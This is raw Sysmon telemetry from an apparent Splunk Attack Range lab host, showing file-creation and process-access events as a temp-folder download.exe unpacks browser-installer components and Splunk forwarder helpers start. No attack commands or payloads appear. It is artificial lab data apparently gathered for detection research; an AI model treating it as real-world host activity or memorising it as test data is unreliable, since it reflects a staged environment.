13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-core-processthreads-l1-1-1.dll2021-01-18 13:59:46.052 11241100x800000000000000013975Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-core-localization-l1-2-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013974Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 
13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-core-file-l2-1-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013973Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\api-ms-win-core-file-l1-2-0.dll2021-01-18 13:59:46.052 11241100x800000000000000013972Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.052{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\AccessibleMarshal.dll2021-01-18 13:59:46.052 11241100x800000000000000013971Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localDLL2021-01-18 13:59:46.036{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\AccessibleHandler.dll2021-01-18 13:59:46.036 11241100x800000000000000013970Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:46.036{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\updater.exe2021-01-18 13:59:46.036 11241100x800000000000000013969Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:46.021{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\setup.exe2021-01-18 13:59:46.021 11241100x800000000000000013968Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 
13:59:46.021{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\plugin-hang-ui.exe2021-01-18 13:59:46.021 11241100x800000000000000013967Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:46.021{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\plugin-container.exe2021-01-18 13:59:46.021 11241100x800000000000000013966Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:46.021{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\pingsender.exe2021-01-18 13:59:46.021 11241100x800000000000000013965Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:46.021{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\minidump-analyzer.exe2021-01-18 13:59:46.021 11241100x800000000000000013964Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:46.021{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\maintenanceservice_installer.exe2021-01-18 13:59:46.021 11241100x800000000000000013963Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 13:59:46.021{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\maintenanceservice.exe2021-01-18 13:59:46.021 11241100x800000000000000013962Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.localEXE2021-01-18 
13:59:45.990{59A5CD1D-9451-6005-2405-00000000A301}6316C:\Users\ADMINI~1\AppData\Local\Temp\nsoB111.tmp\download.exeC:\Users\ADMINI~1\AppData\Local\Temp\7zSCA8F6AE7\core\uninstall\helper.exe2021-01-18 13:59:45.990 10341000x800000000000000014029Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:47.177{59A5CD1D-9453-6005-2705-00000000A301}65366540C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014028Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:47.021{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9453-6005-2705-00000000A301}6536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014027Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:47.021{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014026Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:47.021{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014025Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:47.021{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014024Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:47.021{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014023Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:47.021{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-9453-6005-2705-00000000A301}6536C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014022Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:47.021{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9453-6005-2705-00000000A301}6536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014021Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:47.021{59A5CD1D-9453-6005-2705-00000000A301}6536C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:48.849{59A5CD1D-9454-6005-2905-00000000A301}46842856C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:48.693{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9454-6005-2905-00000000A301}4684C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:48.693{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:48.693{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:48.693{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014042Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:48.693{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014041Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:48.693{59A5CD1D-8E44-6005-0500-00000000A301}640756C:\Windows\system32\csrss.exe{59A5CD1D-9454-6005-2905-00000000A301}4684C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000014040Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:48.693{59A5CD1D-8EE3-6005-B100-00000000A301}41243752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{59A5CD1D-9454-6005-2905-00000000A301}4684C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000014039Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:48.693{59A5CD1D-9454-6005-2905-00000000A301}4684C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x800000000000000014038Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:48.177{59A5CD1D-9454-6005-2805-00000000A301}66086632C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{59A5CD1D-8EE3-6005-B100-00000000A301}4124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014037Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:48.021{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-9454-6005-2805-00000000A301}6608C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014036Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:48.021{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014035Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:59:48.021{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014034Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:59:48.021{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000014033Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 